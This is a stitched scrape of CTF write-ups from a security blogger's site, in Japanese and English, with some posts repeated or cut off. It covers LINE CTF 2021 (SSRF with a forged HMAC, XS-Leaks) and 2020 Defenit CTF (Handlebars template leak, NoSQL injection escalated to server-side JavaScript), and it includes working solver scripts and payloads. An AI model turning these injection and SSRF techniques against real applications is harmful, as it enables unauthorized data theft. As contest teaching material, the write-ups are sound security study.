
|Function|Description|Notes|
|-|-|-|
|`valid_download(src)`|srcが指定されているかを検証する||
|`WriteFile(url)`|引数`url`に対するGETリクエストのレスポンスを、あるファイルに書き込む。|あるファイル: f`backup/${url.split('/')[-1]}`|
|`LanguageNomarize(request)`|リクエストのヘッダ`Lang`の値を正規化する|正規化した後、f`${request.host_url}{language}`にGETリクエストを飛ばす。そのリクエストに対するレスポンスのコードが200だった場合、レスポンスの文字列がreturnされる。|
|`list_routes()`|重要でないため省略||
|`SignCheck(request)`|リクエストのクエリ文字列に対するHMAC検証を行う|`GET /rollback`と`GET or POST /rollback`内で利用されている。|

### Utilities in `app.rollback`

|Function|Description|Notes|
|-|-|-|
|`RunRollbackDB(dbhash)`|DBのロールバックを実行する|`backup/`以下に、引数`dbhash`から記号を取り除いた名前のファイルがあれば、(なぜか)FLAGの内容を読み出して返してくれる。|
|`RunbackupDB(remove, dbhash)`|省略||

### Endpoints

|Endpoint|Description|Notes|
|-|-|-|
|`GET /index`|トップページ||
|`GET /en`|省略||
|`GET /jp`|省略||
|`GET /coin`|コインの価格情報を返すAPI|レスポンスのヘッダー`Lang`には`app.main.LanguageNomarize(request)`の結果がセットされる|
|`GET /download`|パラメータ`src`で指定されたURLをダウンロードする|ダウンロードには`app.main.download(src)`を利用する|
|`POST /download`|`GET /download`と同様||
|`GET /addsub`|新規Subscriber登録用API||
|`GET /integrityStatus`|DBの完全性に関するステータス取得用API|DBファイルのパスと、現在のDBの整合性検証用ハッシュ(`dbHash`)の値が取得できる。|
|`GET /rollback`|DBのロールバック用API|`app.main.SignCheck(request)`をpassすると、`app.main.Activity.IntegrityCheck`が実行される。引数`key`には、リクエストヘッダ`Key`の値が渡され、引数`dbHash`にはクエリ文字列で指定した`dbhash`の値が渡される。|

### Solver

```py
import hashlib
import hmac
import json
from urllib.parse import urljoin

import requests

PUBLIC_BASE_URL = 'http://35.190.234.195/'
PRIVATE_HOST = 'localhost:5000'

PRIVATE_KEY = b"let'sbitcorinparty"


def get_db_hash() -> str:
    res = requests.get(urljoin(PUBLIC_BASE_URL, '/'),
                       headers={
                           'Host': PRIVATE_HOST,
                           'Lang': 'integrityStatus'
                       })
    return json.loads(res.headers['lang'])['dbhash']


def generate_sign(s: str) -> str:
    return hmac.new(PRIVATE_KEY, s.encode(), hashlib.sha512).hexdigest()


def generate_key(s: str) -> str:
    return hashlib.sha512(s.encode('ascii')).hexdigest()


def add_prefix(s: str, prefix: str) -> str:
    return f'{prefix}{s}'


def execute_download(srcUrl: str) -> requests.Response:
    sign = generate_sign(f'src={srcUrl}')
    return requests.get(urljoin(PUBLIC_BASE_URL, '/'),
                        headers={
                            'Host': PRIVATE_HOST,
                            'Lang': f'download?src={srcUrl}',
                            'Sign': sign
                        })


def execute_rollback(dbHash: str) -> requests.Response:
    FRAGMENT = '_'

    key = generate_key(dbHash)
    sign = generate_sign(f'dbhash={add_prefix(dbHash, FRAGMENT)}')

    return requests.get(urljoin(PUBLIC_BASE_URL, '/'),
                        headers={
                            'Host': PRIVATE_HOST,
                            'Lang': f'rollback?dbhash={add_prefix(dbHash, FRAGMENT)}',
                            'Key': key,
                            'Sign': sign
                        })


def exploit():
    execute_download(f'https://lab.8ay.ac/{get_db_hash()}')
    res = execute_rollback(get_db_hash())

    print(f'flag: {res.headers["lang"]}')


if __name__ == "__main__":
    exploit()
```

### Flag

`LINECTF{YOUNGCHAYOUNGCHABITCOINADAMYMONEYISBURNING}`

## [Web 50pts] Your Note (22/680 Solves)

### 問題文

```txt
Secure private note service
※ Admin have disabled some security feature of their browser...

Flag Format: LINECTF{[a-z0-9-]+}

添付ファイル: your-note.zip
```

### Writeup

`GET /search`のソースコードの下記部分に注目した。

```py
@app.route('/search')
@login_required
def search():
    q = request.args.get('q')
    download = request.args.get('download') is not None
    if q:
        notes = Note.query.filter_by(owner=current_user).filter(or_(Note.title.like(f'%{q}%'), Note.content.like(f'%{q}%'))).all()
        if notes and download:
            return Response(json.dumps(NoteSchema(many=True).dump(notes)), headers={'Content-disposition': 'attachment;filename=result.json'})
    else:
        return redirect(url_for('index'))
    return render_template('index.html', notes=notes, is_search=True)
```

8~9行目を見ると、下記の条件がすべて整っているとき、レスポンスヘッダに`Content-disposition: attachment`が入ってくることがわかる。

- 検索機能で得られたNoteの件数が1件以上である
- request.args.get('download')がNoneでない

要するに、検索機能において、クエリ文字列として`?download=`を与えた上で検索機能を実行した結果が、下記のように分かれる。

|検索機能で得られたNoteの件数|レスポンスに`Content-disposition: attachment`が付くか|
|:-:|:-:|
|1件以上|✅|
|1件よりも少ない|✖|

この性質をオラクルとしたXS Leaksが想定解法と予想した。
実際に、管理者に`{{BASE_URL}}/search?q=%&download`[^6]というURLをレポートしたところ、通常とは違う`ng`というメッセージが出たため、この予想は正しかった。

### Solver

下記のSolverを使って、flag文字列を頭から一文字ずつ抽出した。[^7]

```py
import os
import string
import subprocess
from concurrent.futures.thread import ThreadPoolExecutor
from urllib.parse import quote, urljoin

from selenium import webdriver
from selenium.webdriver.chrome.options import Options

BASE_URL = os.getenv('BASE_URL')

USERNAME = os.getenv('USERNAME')
PASSWORD = os.getenv('PASSWORD')

S = string.ascii_lowercase + string.digits + '-'

FLAG_PRE = 'LINECTF{'
FLAG_SUF = '}'


def length_is(n: int) -> str:
    return f'{FLAG_PRE}{"_" * n}{FLAG_SUF}'


def nth_char_is(n: int, c: str) -> str:
    return f'{FLAG_PRE}{"_" * (n - 1)}{c}%{FLAG_SUF}'


def prop_holds(prop: str):
    print(f"\r[info] Attempting this prop => '{prop}'\033[0K", end='')

    options = Options()
    options.add_argument('--headless')
    driver = webdriver.Chrome(os.getenv('CHROME_DRIVER_PATH'), options=options)
    try:
        # Login
        driver.get(urljoin(BASE_URL, '/login'))
        driver.find_element_by_css_selector('input[name=username]').send_keys(USERNAME)
        driver.find_element_by_css_selector('input[name=password]').send_keys(PASSWORD)
        driver.find_element_by_css_selector('button[type=submit]').submit()

        # Move to /report
        report_bug_button = driver.find_element_by_css_selector('a.button.is-warning.is-light')
        report_bug_button.click()

        # Proof of work
        pow_cmd = driver.find_element_by_tag_name('strong').get_attribute('textContent').split('&&')[-1].strip()
        proof = subprocess.check_output(pow_cmd, shell=True).decode()

        # Make the payload
	    payload = urljoin(BASE_URL, f'/search?q={prop}&download=')

        # Submit the payload
        driver.find_element_by_css_selector('input[name=url]').send_keys(payload)
        driver.find_element_by_css_selector('input[name=proof]').send_keys(proof)
        driver.find_element_by_css_selector(
            '#content > div > div > div.box > form > div:nth-child(4) > p > button').submit()

        # Check the result
        flash_message_el = driver.find_element_by_css_selector(
            '#content > div > div > div.box > form > div:nth-child(6)')
        truth = flash_message_el.get_attribute('textContent').strip() == 'ng'

        return prop, truth

    except Exception as e:
        return prop, False

    finally:
        driver.close()


def backup(revealed_flag: str):
    with open('flag.bak', mode='w') as f:
        f.write(revealed_flag)


if __name__ == "__main__":
    with ThreadPoolExecutor(max_workers=8) as executor:
        upper_bound = 50
        props = [length_is(i) for i in range(1, upper_bound + 1)]
        secret_length = [v[0].count('_') for i, v in enumerate(list(executor.map(prop_holds, props))) if v[1]].pop()

    print(f'\r[+] secret_length: {secret_length}\033[0K')

    secret = ''
    for i in range(1, secret_length + 1):
        with ThreadPoolExecutor(max_workers=4) as executor:
            props = [nth_char_is(i, c) for c in S]
            possible_chars = [v for v in executor.map(prop_holds, props) if v[1]]
            if len(possible_chars) == 1:
                secret += possible_chars.pop()[0].lstrip(f'{FLAG_PRE}{"_" * (i - 1)}').rstrip(f'%{FLAG_SUF}')
            else:
                secret += '?'

            print(f'\r[+] ~N={i} => {secret}\033[0K')
            backup(f'{FLAG_PRE}{secret}')

    print(f'[*] flag: {FLAG_PRE}{secret}{FLAG_SUF}')
```

### Flag

`LINECTF{1-kn0w-what-y0u-d0wn10ad}`

## 注釈

[^1]: こちらは、チームメイトの[@y0d3n](https://twitter.com/y0d3n)氏と解きました。
[^2]: ひとまず簡単なWriteup出しておいて、復習するタイミングで詳細な解説を付けるやり方は、割とありな気がしている。
[^3]: FYI: <https://qiita.com/no1zy_sec/items/dfccd91cf76bf73b7754>
[^4]: GETリクエストがあればflagを入手するには十分だったため、他のメソッドのリクエストが発行できるかは調査しなかった。
[^5]: フォワードされた後、`app.main.LanguageNomarize(request)`を用いて、正規化される場合がある。
[^6]: `%`は0文字以上の文字列を表すワイルドカード
[^7]: 実際には、チームメイトの[@y0d3n](https://twitter.com/y0d3n)氏による手動リークの方が速かったが、プライバシーの観点から、彼の顔写真の代わりにPythonによるSolverスクリプトを掲載した。


こんにちは、8ayacです🐝
本記事は、LINE CTF 2021で解いた2問のWriteupです。
解いた問題は、diveinternalとYour Note^1です。

感謝と謝罪とWriteupは鮮度が大事らしいので、内容は丁寧な解説とかはなく、簡易的なものになっています。^2
基本的には、問題の内容を知っている人向けの説明になっており、コンテキストが大きく省略されている部分がありますので、ご注意ください。

The English version is here

\[Web 50pts] diveinternal (65/680 Solves)

問題文



Writeup

配…

ISCCTF 2020 開催記

:page_facing_up: Migrate articles from Hatena Blog.

:recycle: Unify uppercase letters in metadata id to lowercase letters.

:recycle: Modify the image's source path.

Revert commits to enable image optimization.

こんにちは、8ayacです🐝

本記事では、2020/10/24(土)に開催したISCCTF 2020について、反省を交えて色々書きました。
筆者は、問題サーバのデプロイ以外をほぼ全てを担当していたため、書くことが多く、少し長めの記事になりましたが、興味のあるところだけでも読んでもらえると嬉しいです。

ちなみに、ISCCTF 2020自体は、(SurveyやTwitterのリアクションを見ている限りでは、)想像以上に好評でした。
競技開始前も競技中も、色々な心配を抱えながら運営をしていたので、安堵しています。

「ISCCTF 2020」の概要

ISCCTF 2020の概要は以下の通りで…

ISCCTF 2020 作問者Writeup(Greetinjs/mark damn it) と所感

こんにちは、8ayacです🐝

今回は、2020/10/24(土)に開催した入門者向けCTF「ISCCTF 2020」で、私が作問した問題のWriteupを紹介しつつ、軽く所感とか振り返りを(軽く)書きました。

## [Web 100pts - 88.09% solves[^1]] Greetinjs

作問者Writeupは[こちら](https://github.com/IPFactory/ISCCTF2020/tree/main/web/Greetinjs/solution)

### 振り返り

CTFに馴染みがなくても解けるレベルの問題を目指しました。
もしかしたら、この手の問題は概出かもしれませんが、**入門者向け**CTFのwarmup問となると、被るのも仕方がないかな、と考えていました。

### 所感

あるWebページが読み込んでいるリソースまで注目するのは重要ですよね。

## [Web 475pts - 19.04% solves[^2]] mark damn it

作問者Writeupは[こちら](https://github.com/IPFactory/ISCCTF2020/tree/main/web/mark-damn-it/solution)

### 振り返り

mark damn itは、CVE-2020-14001を使ったRCEをテーマにした問題でした。
この脆弱性は、バージョン2.3.0以前の[Kramdown](https://kramdown.gettalong.org/)にあったRCEです。

筆者は、real-worldの脆弱性が好きなので、何かしらCVEをテーマにした問題を出したいと考えていました。
入門者向けとなると難しいなあ、と思っていたところ、Pwn/Rev/Misc作問担当の[@n01e0](https://twitter.com/n01e0)が、「[これ](https://www.feneshi.co/blog/CVE-2020-14001/)誰か使いませんか」と投げてくれたので、私が問題にした感じです。
Rubyを書いた経験はほとんどなかったので、Rubyの勉強になりました。

### 所感

MarkdownをHTMLに変換してレンダリングする機能には、脆弱性が作り込まれやすいイメージがあります。
ちなみに、筆者がバグバウンティで初めて報告した脆弱性は、そのような機能でのXSS[^3]でした。

## まとめ

これ、実質作問していないのでは...?

CTFの作問は楽しいので、もっとCTFに自分の問題を出してみたいなあ。

## 注釈

[^1]: 参加者のうち1点以上を獲得した84人中74人が正答
[^2]: 参加者のうち1点以上を獲得した84人中16人が正答
[^3]: <https://hackerone.com/reports/384255>


こんにちは、8ayacです🐝

今回は、2020/10/24(土)に開催した入門者向けCTF「ISCCTF 2020」で、私が作問した問題のWriteupを紹介しつつ、軽く所感とか振り返りを(軽く)書きました。

\[Web 100pts - 88.09% solves^1] Greetinjs

作問者Writeupはこちら

振り返り

CTFに馴染みがなくても解けるレベルの問題を目指しました。
もしかしたら、この手の問題は概出かもしれませんが、入門者向けCTFのwarmup問となると、被るのも仕方がないかな、と考えていました。

所感

あるWebページが読み込んでいるリソースまで注目…

ISC BugHunt101 CTF 2020 作問者 Writeup

こんにちは、8ayacです🐝
今回は、"ISC BugHunt101 CTF 2020"で作問した3問のWriteupを書きました。
全部Webです。

ISC BugHunt101 CTF 2020とは

ISC BugHunt101 CTF 2020は、筆者が、筆者の通う学校の生徒向けにプライベートで開催したCTFのことです。
最近、筆者の通う学校の生徒を対象に「バグハント入門」というテーマでオンライン講義を行う機会があり、その一環で開催したという経緯です。
講義自体は、合計400分で、CTFには最後の100分で、各々チームを作って挑戦してもらいました。
なお、参加者のレベル感的には、ほ…

2020 Defenit CTF Writeup ([Web]BabyJS, Fortune Cookie) - [English]

Hi, I'm 8ayac🐝 This post is a writeup of the 2 challenges I solved in [2020 Defenit CTF](https://ctftime.org/event/1060).
The challenges I solved are "Fortune Cookies" and "BabyJS" in Web category.

In addition, the result was a total of 1053pts and was 55th out of 964 teams.

![The result of IPFactory](img/writeup-of-2020-defenit-ctf-english-ver/IPFactory_result.png?w=229&h=43)

日本語版は[こちら](http://caya8.hatenablog.com/entry/2020/06/07/181927)

## [Web 248pts] BabyJS (47/964 Solves)

### Problem

```txt
Description
    Render me If you can.

Server
    babyjs.ctf.defenit.kr

Attachments
    babyjs.tar.gz
```

### Problem app overview

When I extracted the problem file, I found the source code of the application and the Docker configuration file etc.
It was an app written using Express, and template engine is [Handlebars](https://handlebarsjs.com/).

```javascript
const express = require('express');
const path = require('path');
const crypto = require('crypto');
const fs = require('fs');
const app = express();

const SALT = crypto.randomBytes(64).toString('hex');
const FLAG = require('./config').FLAG;

app.set('view engine', 'html');
app.engine('html', require('hbs').__express);

if (!fs.existsSync(path.join('views', 'temp'))) {
    fs.mkdirSync(path.join('views', 'temp'));
}

app.use(express.urlencoded());
app.use((req, res, next) => {
    const { content } = req.body;

    req.userDir = crypto.createHash('md5').update(`${req.connection.remoteAddress}_${SALT}`).digest('hex');
    req.saveDir = path.join('views', 'temp', req.userDir);

    if (!fs.existsSync(req.saveDir)) {
        fs.mkdirSync(req.saveDir);
    }

    if (typeof content === 'string' && content.indexOf('FLAG') != -1 || typeof content === 'string' && content.length > 200) {
        res.end('Request blocked');
        return;
    }

    next();
});

app.get('/', (req, res) => {
    const { p } = req.query;
    if (!p) res.redirect('/?p=index');
    else res.render(p, { FLAG, 'apple': 'mint' });
});

app.post('/', (req, res) => {
    const { body: { content }, userDir, saveDir } = req;
    const filename = crypto.randomBytes(8).toString('hex');

    let p = path.join('temp', userDir, filename)

    fs.writeFile(`${path.join(saveDir, filename)}.html`, content, () => {
        res.redirect(`/?p=${p}`);
    })
});

app.listen(8080, '0.0.0.0');
```

Below is an overview of the features in the app.
See the source code for details.

- `GET /`: Display a page
  - Render the view specified by the GET parameter `p`
- `POST /`: Post some text
  - A file is created on the server whose content is the value of the POST parameter `content`.
    - After posting, if there is no problem (described later), you will be automatically redirected to `/?p={posted file path}`.
  - Create a file on the server whose content is the value of the POST parameter `content`.
  - After posting, if there is no problem (details will be described later), you will be automatically redirected to `/?p={posted file path}`.

### What is the final goal?

A variable `FLAG` is passed to view in the part commented with ★ in the following part.
I thought if I post a view that renders it properly I would get the flag.

```javascript
app.get('/', (req, res) => {
    const { p } = req.query;
    if (!p) res.redirect('/?p=index');
    else res.render(p, { FLAG, 'apple': 'mint' });  // ★
});
```

However, if you simply try to post a view written as `{{FLAG}}`, it will be blocked at the place marked with ① in the middleware like below.
Also, posts longer than 200 characters will be blocked.

```javascript
app.use((req, res, next) => {
    const { content } = req.body;

    req.userDir = crypto.createHash('md5').update(`${req.connection.remoteAddress}_${SALT}`).digest('hex');
    req.saveDir = path.join('views', 'temp', req.userDir);

    if (!fs.existsSync(req.saveDir)) {
        fs.mkdirSync(req.saveDir);
    }

    if (typeof content === 'string' && content.indexOf('FLAG') != -1 || typeof content === 'string' && content.length > 200) {  // ①
        res.end('Request blocked');
        return;
    }

    next();
});
```

It seems to be okay setting the final goal to post a view within 200 characters that does not include the character `FLAG`.

### Solution

Finally, referring to [this document](https://handlebarsjs.com/guide/builtin-helpers.html#each), I created the following payload.

```handlebars
{{#each this}}{{@key}} => {{this.toString}}<br>{{/each}}
```

When I actually posted it, the flag was displayed as follows.

![Got the flag of this problem](img/writeup-of-2020-defenit-ctf-english-ver/babyjs_got_the_flag.png?w=543&h=172)

#### Explanation of the payload

You can see `this` in the payload, and that is an object like below.
I used the Handlebars's Built-in Helper [#each](https://handlebarsjs.com/guide/builtin-helpers.html#each) to render all keys and values.toString() ​​of this object.

```txt
{
    settings: {
        'x-powered-by': true,
        etag: 'weak',
        'etag fn': [Function: generateETag],
        env: 'development',
        'query parser': 'extended',
        'query parser fn': [Function: parseExtendedQueryString],
        'subdomain offset': 2,
        'trust proxy': false,
        'trust proxy fn': [Function: trustNone],
        view: [Function: View],
        views: '/app/views',
        'jsonp callback name': 'callback',
        'view engine': 'html'
    },
    FLAG: 'Defenit{w3bd4v_0v3r_h7tp_n71m_0v3r_Sm8}',
    apple: 'mint',
    _locals: [Object: null prototype] {},
    cache: false
}
```

### Flag

`Defenit{w3bd4v_0v3r_h7tp_n71m_0v3r_Sm8}`

## [Web 507pts] Fortune Cookie (15/964 Solves)

### Problem

```txt
Description
    Here's a test of luck!
    What's your fortune today?

Server
    fortune-cookie.ctf.defenit.kr

Attachments
    fortune-cookie.tar.gz
```

### Problem app overview

When I extracted the problem file, I found the source code of the application and the Docker configuration file etc.
Apparently it's an Express + MongoDB app.

The source code of the application (`data/node/app.py`) is as follows.

```javascript
const express = require('express');
const cookieParser = require('cookie-parser');
const { MongoClient, ObjectID } = require('mongodb');
const { FLAG, MONGO_URL } = require('./config');

const app = express();

app.set('view engine', 'html');
app.engine('html', require('ejs').renderFile);

app.use(cookieParser('🐈' + '🐇'));
app.use(express.urlencoded());


app.get('/', (req, res) => {
    res.render('index', { session: req.signedCookies.user });
});

app.get('/login', (req, res) => {
    res.render('login');
});

app.post('/login', (req, res) => {
    let { username } = req.body;

    res.cookie('user', username, { signed: true });
    res.redirect('/');
});

app.use((req, res, next) => {
    if (!req.signedCookies.user) {
        res.redirect('/login');
    } else {
        next();
    }
});

app.get('/logout', (req, res) => {
    res.clearCookie('user');
    res.redirect('/');
});

app.get('/write', (req, res) => {
    res.render('write');
});

app.post('/write', (req, res) => {

    const client = new MongoClient(MONGO_URL, { useNewUrlParser: true });
    const author = req.signedCookies.user;

    const { content } = req.body;

    client.connect(function (err) {

        if (err) throw err;

        const db = client.db('fortuneCookie');
        const collection = db.collection('posts');

        collection
            .insertOne({
                author,
                content
            })
            .then((result) => {
                res.redirect(`/view?id=${result.ops[0]._id}`)
            }
            );

        client.close();

    });

});

app.get('/view', (req, res) => {

    const client = new MongoClient(MONGO_URL, { useNewUrlParser: true });
    const author = req.signedCookies.user;
    const { id } = req.query;

    client.connect(function (err) {

        if (err) throw err;

        const db = client.db('fortuneCookie');
        const collection = db.collection('posts');

        try {
            collection
                .findOne({
                    _id: ObjectID(id)
                })
                .then((result) => {

                    if (result && typeof result.content === 'string' && author === result.author) res.render('view', { content: result.content })
                    else res.end('Invalid or not allowed');

                }
                );
        } catch (e) { res.end('Invalid request') } finally {
            client.close();
        }


    });
});

app.get('/posts', (req, res) => {

    let client = new MongoClient(MONGO_URL, { useNewUrlParser: true });
    let author = req.signedCookies.user;

    if (typeof author === 'string') {
        author = { author };
    }

    client.connect(function (err) {

        if (err) throw err;

        const db = client.db('fortuneCookie');
        const collection = db.collection('posts');

        collection
            .find(author)
            .toArray()
            .then((posts) => {
                res.render('posts', { posts })
            }
            );

        client.close();

    });

});

app.get('/flag', (req, res) => {

    let { favoriteNumber } = req.query;
    favoriteNumber = ~~favoriteNumber;

    if (!favoriteNumber) {
        res.send('Please Input your <a href="?favoriteNumber=1337">favorite number</a> 😊');
    } else {

        const client = new MongoClient(MONGO_URL, { useNewUrlParser: true });

        client.connect(function (err) {

            if (err) throw err;

            const db = client.db('fortuneCookie');
            const collection = db.collection('posts');

            collection.findOne({ $where: `Math.floor(Math.random() * 0xdeaaaadbeef) === ${favoriteNumber}` })
                .then(result => {
                    if (favoriteNumber > 0x1337 && result) res.end(FLAG);
                    else res.end('Number not matches. Next chance, please!')
                });

            client.close();

        });
    }
})

app.listen(8080, '0.0.0.0');
```

Below is an overview of the features in the app.
See the source code for details.

- `GET /`: Top page
  - Authenticated users → list of features
  - Not authenticated users → link to /login
- `GET /login`: Login page
- `POST /login`: Do login
  - Set a signed cookie `user`
- `GET /logout`: Do logout
  - Discard the set cookie
- `POST /write`: Post some text
- `GET /view`: List posted text
  - You can see all ObjectIds of the documents posted by yourself.
- `GET /posts`: Browse contents of the documents
  - You can see the contents of your post by specifying the ObjectId.
  - Can't see other user's.
- `GET /flag`: Lottery
  - Lucky man will get the flag.
  - Details will be described later

### What is the final goal?

First of all, start to analyze the app to find out what I should do.
There is an endpoint `/flag`, so let's start from here.

```javascript
app.get('/flag', (req, res) => {

    let { favoriteNumber } = req.query;
    favoriteNumber = ~~favoriteNumber;

    if (!favoriteNumber) {
        res.send('Please Input your <a href="?favoriteNumber=1337">favorite number</a> 😊');
    } else {

        const client = new MongoClient(MONGO_URL, { useNewUrlParser: true });

        client.connect(function (err) {

            if (err) throw err;

            const db = client.db('fortuneCookie');
            const collection = db.collection('posts');

            collection.findOne({ $where: `Math.floor(Math.random() * 0xdeaaaadbeef) === ${favoriteNumber}` })
                .then(result => {
                    if (favoriteNumber > 0x1337 && result) res.end(FLAG);   // ★
                    else res.end('Number not matches. Next chance, please!')
                });

            client.close();

        });
    }
})
```

If you get to the line in the code marked with ★, you can read the Flag.
Also, if you read the code purely, you will find that you need to meet all the following conditions to actually get there.

- GET parameter `favoriteNumber` meets `!~~favoriteNumber == True`.
  - [What is `~~`](https://stackoverflow.com/questions/5971645/what-is-the-double-tilde-operator-in-javascript)
  - Because of this condition, some strings are ineligible as the value of `favoriteNumber`.
- Specify GET parameter `favoriteNumber` that makes ``` `Math.floor(Math.random() * 0xdeaaaadbeef) === ${favoriteNumber}` ``` passed as the condition of `collection.findOne()` be True.
- GET parameter `favoriteNumber` meets  `(Math.floor(Math.random() * 0xdeaaaadbeef) === ${favoriteNumber}) == True`を満たす
  - `Math.floor(Math.random() * 0xdeaaaadbeef` is the condition passed to `collection.findOne()` as argument.
- GET parameter `favoriteNumber` is greater than 0x1337.
- There is at least one document in the `posts` collection.

In practice, the value of `Math.floor(Math.random() * 0xdeaaaadbeef)` will be huge, so unless you are a extremely lucky person, it's not a good idea to challenge the lottery.
For the time being, I set the final goal to break this condition by some other approach.

### Consider likely approaches

Now, let's consider a approach to pass the lottery.

First, I considered the vulnerabilities likely to use.
The app uses MongoDB, so I suspected NoSQL Injection.
Also, even if you look at the configuration file, it seems that you can chain to SSJI from NoSQL injection.
If you can do SSJI and rewrite the contents of `Math.floor()` into a function that returns a fixed value, you can easily pass the test.

### Find NoSQL Injection

Okay, let's find NoSQL Injection.

Found it.

```javascript
app.post('/login', (req, res) => {
    let { username } = req.body; // ①

    res.cookie('user', username, { signed: true });
    res.redirect('/');
});

︙

app.get('/posts', (req, res) => {

    let client = new MongoClient(MONGO_URL, { useNewUrlParser: true });
    let author = req.signedCookies.user; // ②

    if (typeof author === 'string') {
        author = { author }; // ③
    }

    client.connect(function (err) {

        if (err) throw err;

        const db = client.db('fortuneCookie');
        const collection = db.collection('posts');

        collection
            .find(author) // ④
            .toArray()
            .then((posts) => {
                res.render('posts', { posts })
            }
            );

        client.close();

    });

});
```

#### Explanation

The basic request for `POST /login` looks like this:

```http
POST /login HTTP/1.1
Host: fortune-cookie.ctf.defenit.kr
Content-Length: 16
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
Origin: http://fortune-cookie.ctf.defenit.kr
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://fortune-cookie.ctf.defenit.kr
Accept-Encoding: gzip, deflate
Accept-Language: ja,en-US;q=0.9,en;q=0.8,zh-CN;q=0.7,zh;q=0.6
Connection: close

username=8ayac
```

When you send it, the value of `req.body` becomes `{ username: '8ayac' }` (in the line with the comment ①) and the value `8ayac` corresponding to this object `username` key will be set as the variable `username`.
And the signed cookie `user` holds the value `8ayac`.
This cookie will be set in the response and the authenticated users will use it from then on.

Below is the actual response.

```http
HTTP/1.1 302 Found
Server: nginx/1.14.0 (Ubuntu)
Date: Sun, 07 Jun 2020 01:01:54 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 46
Connection: close
X-Powered-By: Express
Set-Cookie: user=s%3A8ayac.u%2B5zh6Yd%2Fw28iIedhUa9yRii9zcX4thK7%2FANBXHDhXs; Path=/
Location: /
Vary: Accept

<p>Found. Redirecting to <a href="/">/</a></p>
```

Within `POST /posts`, the set cookies are normally used in the following order.

1. It is assigned to the variable `author` (in the line marked with ②)
2. Converted to an object (in the line marked with ③)
3. Used as a query selector for `find()` (in the line marked with ④)

For example, suppose the cookie value is `8ayac`.
This value is converted to an object called `{"author": "8ayac"}` in ③, and finally a query is issued so that the document whose `author` is `8ayac` is retrieved.

There is a vulnerability here.
If the object is set in the cookie, you can freely manipulate the conditions passed to the find query.

For example, suppose the cookie value is `{content:{'$regex':'.*'}}`.
This object will be used in ④ directly after being assigned to the variable `author` in ②.
As a result, a query will be issued that retrieves documents whose `content` matches the regular expression `.*`.

If you want to set a value like that into a cookie in practice, send a request like bellow:
With an appropriately customized payload, you can set any object to a cookie value.

```http
POST /login HTTP/1.1
Host: fortune-cookie.ctf.defenit.kr
Content-Length: 14
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
Origin: http://fortune-cookie.ctf.defenit.kr
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://fortune-cookie.ctf.defenit.kr/login
Accept-Encoding: gzip, deflate
Accept-Language: ja,en-US;q=0.9,en;q=0.8,zh-CN;q=0.7,zh;q=0.6
Connection: close

username[content][$regex]=.*
```

### Upgrade to SSJI

MongoDB has some features that perform server-side execution of JavaScript code.
The `$where` operator is one of them.
For more information, please see <https://docs.mongodb.com/manual/core/server-side-javascript/>.

> $where operator that evaluates a JavaScript expression or a function in order to query for documents.

Below you can see that the `eval` function in the `$where` condition has been actually performed.

```shell-session
root@5895c47e40e5:/# mongo -u redacted -p redacted
MongoDB shell version v4.2.7
(snip)
> use fortuneCookie
switched to db fortuneCookie
> db.posts.find({ $where: "eval(1+1) == 1" })
> db.posts.find({ $where: "eval(1+1) == 2" })
{ "_id" : ObjectId("5edc178c9ee53600459bd3b0"), "author" : "8ayac", "content" : "hoge" }
{ "_id" : ObjectId("5edc373b9ee53600459bd3b1"), "author" : "8ayac", "content" : "fuga" }
```

At last, let's make payload to rewrite `Math.floor` function well.

### Solver

I wrote a solver like below:

```python
#!/usr/bin/env python3
import requests


"""
Constants
"""
URL = 'http://fortune-cookie.ctf.defenit.kr'
N = 588488491  # Large enough to prevent accidents in a shared environment


"""
Exploit
"""
s = requests.Session()

payload = f"Math.floor = this.constructor.constructor('return {N}'); return 0"
s.post(f'{URL}/login', data={"username[$where]": payload})
s.get(f'{URL}/posts')

flag = s.get(f'{URL}/flag', params={'favoriteNumber': N}).text
print(f'{flag=}')
```

Executed it, then I got the flag.
Yay!

```shell-session
$ python3 solver.py
flag='Defenit{c0n9r47ula7i0n5_0n_y0u2_9o0d_f02tun3_haHa}'
```

### Flag

`Defenit{c0n9r47ula7i0n5_0n_y0u2_9o0d_f02tun3_haHa}`

## Thoughts(?)

I really enjoyed the challenges!
Thank you Defenit CTF.

## Inquiry

If you have any questions or suggestions regarding this article, please contact [8ayac](https://twitter.com/8ayac).
In addition, since I am studying English, I would be happy if you could tell me about my strange English expressions.

Thanks!


Hi, I'm 8ayac🐝 This post is a writeup of the 2 challenges I solved in 2020 Defenit CTF.
The challenges I solved are "Fortune Cookies" and "BabyJS" in Web category.

In addition, the result was a total of 1053pts and was 55th out of 964 teams.

The result of IPFactory

日本語版はこちら

\[Web 248pts] BabyJS…

2020 Defenit CTF Writeup ([Web]BabyJS, Fortune Cookie)

こんにちは、8ayacです🐝
今回は、2020 Defenit CTFで解いた2問のWriteupを書きました。
解いた問題はFortune CookieとBabyJSで、どちらもWebです。

ちなみに結果は、合計得点1053ptsで、964チーム中55位でした。

IPFactoryの結果

The English version is here

\[Web 248pts] BabyJS (47/964 Solves)

問題文



問題アプリの概要

添付ファイルを解凍してみると、アプリのソースコードやdockerの設定ファイルやらが出てきました。
どうやらExpressを使って書…